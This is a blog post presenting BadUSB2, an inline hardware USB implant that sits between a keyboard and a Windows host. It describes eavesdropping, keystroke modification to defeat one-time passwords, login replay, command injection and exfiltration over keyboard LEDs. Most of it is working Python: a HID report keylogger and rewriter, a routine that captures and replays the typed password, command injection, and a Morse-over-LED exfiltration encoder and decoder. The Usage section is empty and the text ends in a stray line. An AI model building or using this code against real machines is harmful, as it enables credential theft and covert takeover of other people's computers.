Sunday, November 5, 2017

BADUSB 2.0 USB MITM POC. BadUSB2 is an INLINE hardware implant: it sits between the keyboard and the host, which gives it the stealth of a hardware keylogger but far more capabilities (the attacks listed below).

HARDWARE NEEDED:
x1 Linux build (tested on default install of Ubuntu 14.04)
x1 Windows XP/7 (our target)
x2 Facedancers
x3 USB type A-male to USB Mini-B cables
x1 USB Keyboard (tested on HP & Genius brands)
Implemented Proof of Concept Attacks:
+ Eavesdrop. Once the keyboard has been registered to the target, all keystrokes are captured to the ‘/tmp’ folder.
+ Modify. Weaponised code could use regular expressions to modify user keystrokes in order to defeat one-time passwords. In this POC we simply annoy the user 🙂
+ Replay. The POC code automatically detects ‘ctrl-alt-delete’ and assumes a login session is starting. It stops recording once the ‘enter’ key is pressed. At any time the ‘replay’ command can be given to automatically authenticate to the workstation.
+ Fabricate. Start/Run or generic commands can be issued to the target operating system just as if you were at the keyboard.
+ Exfiltrate. I’ve implemented a PowerShell exfiltration POC that uses the ‘morse code’ technique (keyboard LEDs) to exfiltrate data. Using custom HID output reports would be faster, but since Windows 2000 MS Windows does not let user-mode applications open keyboard HID devices for read/write. In short, this is a very rudimentary POC, and did I mention it is very slow!
+ BadUSB. I did not actually implement a POC for this. The Facedancer has plenty of example code that can be used to fake USB peripherals to the host, but it would be nice to implement some of the BadUSB “Kali NetHunter” type attacks here.
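The eavesdrop, modify, replay and fabricate attacks above all come down to what the implant does with each keyboard report it relays. The following is an added Python example (Facedancer tooling is Python, but this is not the project's code) that decodes 8-byte boot-protocol USB HID keyboard reports and implements the four behaviours on them. The `Implant` class, its method names, the ‘o’ to ‘0’ annoyance rule and the sample login session are assumptions made for this example.

```python
"""Added example: inline keyboard MITM on boot-protocol HID reports (not the BadUSB2
project's code; class/method names and the sample session are assumptions)."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Boot keyboard input report: byte 0 modifiers, byte 1 reserved, bytes 2-7 keycodes
MOD_LCTRL, MOD_LSHIFT, MOD_LALT = 0x01, 0x02, 0x04
MOD_RCTRL, MOD_RSHIFT, MOD_RALT = 0x10, 0x20, 0x40
KEY_ENTER, KEY_DELETE = 0x28, 0x4C
RELEASE = bytes(8)                      # all keys up

KEYMAP = {}                             # keycode -> (unshifted, shifted); subset used here
for i, ch in enumerate("abcdefghijklmnopqrstuvwxyz"):
    KEYMAP[0x04 + i] = (ch, ch.upper())
for i, (lo, hi) in enumerate(zip("1234567890", "!@#$%^&*()")):
    KEYMAP[0x1E + i] = (lo, hi)
KEYMAP.update({0x2C: (" ", " "), 0x2D: ("-", "_"), 0x2E: ("=", "+"), 0x37: (".", ">")})
CHARMAP = {"\n": (KEY_ENTER, 0)}        # char -> (keycode, needs_shift)
for code, pair in KEYMAP.items():
    for shift, c in enumerate(pair):
        CHARMAP.setdefault(c, (code, shift))

def decode_report(report: bytes) -> str:
    """Text produced by one report; modifier-only and release reports yield ''."""
    if len(report) != 8:
        raise ValueError("boot keyboard reports are 8 bytes")
    shifted = bool(report[0] & (MOD_LSHIFT | MOD_RSHIFT))
    out = []
    for code in report[2:]:
        if code == KEY_ENTER:
            out.append("\n")
        elif code in KEYMAP:
            out.append(KEYMAP[code][shifted])
    return "".join(out)

def encode_text(text: str) -> list[bytes]:
    """Press/release report pairs that type `text` (used by fabricate and modify)."""
    reports = []
    for c in text:
        code, shift = CHARMAP[c]
        reports.append(bytes([MOD_LSHIFT if shift else 0, 0, code, 0, 0, 0, 0, 0]))
        reports.append(RELEASE)
    return reports

def typed(reports: list[bytes]) -> str:
    return "".join(decode_report(r) for r in reports)   # what the host would see typed

def is_ctrl_alt_del(report: bytes) -> bool:
    mods = report[0]
    return bool(mods & (MOD_LCTRL | MOD_RCTRL)) and bool(mods & (MOD_LALT | MOD_RALT)) \
        and KEY_DELETE in report[2:]

@dataclass
class Implant:
    """Inline between keyboard and host: on_report() returns what the host receives."""
    keylog: list[str] = field(default_factory=list)      # eavesdrop
    login: list[bytes] = field(default_factory=list)     # replay buffer
    recording: bool = False
    rewrite: tuple[re.Pattern, str] | None = None        # modify rule (pattern, replacement)

    def on_report(self, report: bytes) -> list[bytes]:
        text = decode_report(report)
        if text:
            self.keylog.append(text)
        if is_ctrl_alt_del(report):          # heuristic: a login session is starting
            self.login, self.recording = [], True
        elif self.recording:
            self.login.append(report)        # keep raw reports so shift state survives
            if KEY_ENTER in report[2:]:      # credentials submitted: stop recording
                self.recording = False
        if self.rewrite and text:
            pattern, repl = self.rewrite
            new = pattern.sub(repl, text)
            if new != text:
                return encode_text(new)      # host sees the substituted keystrokes
        return [report]

    def replay(self) -> list[bytes]:
        return list(self.login)              # re-send the login exactly as typed

    def fabricate(self, command: str) -> list[bytes]:
        return encode_text(command + "\n")   # type a command as if at the keyboard

def demo() -> tuple[Implant, list[bytes]]:
    """Constructed session: ctrl-alt-del, password, enter, then ordinary typing."""
    implant = Implant(rewrite=(re.compile("o"), "0"))    # the 'annoy the user' rule
    session = [bytes([MOD_LCTRL | MOD_LALT, 0, KEY_DELETE, 0, 0, 0, 0, 0]), RELEASE]
    session += encode_text("hunter2\n") + encode_text("hello world")
    forwarded = []
    for report in session:
        forwarded += implant.on_report(report)
    return implant, forwarded
```

A real implant would feed `on_report()` from the path that receives reports from the physical keyboard and send the returned reports to the host; `replay()` and `fabricate()` give the report sequence to inject when the operator issues the command. The login buffer keeps the raw reports rather than decoded text, so replay does not depend on the keymap being complete. Ctrl-alt-delete is only a heuristic for the start of a login: it is also pressed to unlock a locked workstation, which for the purposes of replay yields the same password.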
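The LED exfiltration channel, as an added Python example seen from the implant side (this is not the project's PowerShell POC): the host toggles Scroll Lock in Morse timing, each change reaches the keyboard, and therefore the inline implant, as a HID output report, and the implant recovers the message by timing the transitions. The dot length `UNIT`, the choice of Scroll Lock, the function names and the sample message are assumptions made for this example; `airtime_units()` makes the "very slow" remark concrete.

```python
"""Added example: Morse-over-keyboard-LED exfiltration, sender schedule and implant-side
decoder (not the project's code; UNIT, LED choice and sample message are assumptions)."""
from __future__ import annotations

MORSE = {
    "A": ".-", "B": "-...", "C": "-.-.", "D": "-..", "E": ".", "F": "..-.", "G": "--.",
    "H": "....", "I": "..", "J": ".---", "K": "-.-", "L": ".-..", "M": "--", "N": "-.",
    "O": "---", "P": ".--.", "Q": "--.-", "R": ".-.", "S": "...", "T": "-", "U": "..-",
    "V": "...-", "W": ".--", "X": "-..-", "Y": "-.--", "Z": "--..",
    "0": "-----", "1": ".----", "2": "..---", "3": "...--", "4": "....-",
    "5": ".....", "6": "-....", "7": "--...", "8": "---..", "9": "----.",
}
FROM_MORSE = {v: k for k, v in MORSE.items()}
SCROLL_LOCK = 0x04   # LED bit in the keyboard output report (bit0 Num, bit1 Caps, bit2 Scroll)
UNIT = 0.2           # assumed dot length in seconds on the sending side

def morse_schedule(text: str) -> list[tuple[bool, int]]:
    """(led_on, units) steps the sender drives: dot 1, dash 3; gaps 1/3/7 for symbol/letter/word."""
    steps = []
    for wi, word in enumerate(text.upper().split()):
        if wi:
            steps.append((False, 7))
        for ci, ch in enumerate(word):
            if ci:
                steps.append((False, 3))
            for si, sym in enumerate(MORSE[ch]):
                if si:
                    steps.append((False, 1))
                steps.append((True, 1 if sym == "." else 3))
    return steps

def airtime_units(text: str) -> int:
    """Total dot-units on the wire; multiply by UNIT for seconds."""
    return sum(units for _, units in morse_schedule(text))

def led_trace(steps, unit: float = UNIT, start: float = 0.0) -> list[tuple[float, int]]:
    """Timestamped (t, led_byte) output reports as the implant would log them."""
    trace, t = [], start
    for on, units in steps:
        trace.append((t, SCROLL_LOCK if on else 0))
        t += units * unit
    trace.append((t, 0))           # final LED-off report ends the last symbol
    return trace

def decode_led_trace(trace, unit: float = UNIT) -> str:
    """Rebuild the message from LED transitions by classifying on/off durations."""
    symbols, letters, words = [], [], []

    def end_letter():
        if symbols:
            letters.append(FROM_MORSE.get("".join(symbols), "?"))
            symbols.clear()

    def end_word():
        end_letter()
        if letters:
            words.append("".join(letters))
            letters.clear()

    for (t0, led), (t1, _) in zip(trace, trace[1:]):
        units = round((t1 - t0) / unit)
        if led & SCROLL_LOCK:              # LED on: dot or dash
            symbols.append("." if units < 2 else "-")
        elif units >= 7:                   # long silence: word boundary
            end_word()
        elif units >= 3:                   # medium silence: letter boundary
            end_letter()
    end_word()
    return " ".join(words)

if __name__ == "__main__":
    msg = "sos 42"                         # constructed sample message
    print(decode_led_trace(led_trace(morse_schedule(msg))),
          "in", airtime_units(msg) * UNIT, "seconds")
```

Only LED transitions carry information, so the decoder needs nothing from the host but the output reports it already receives as a keyboard; the cost is the data rate, which for a six-character message is already tens of seconds at a 200 ms dot. Jitter in when the host actually issues the SET_REPORT is absorbed by rounding each duration to whole units, which is why the unit must be long compared with USB scheduling delays.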
Usage:


Man in the Rain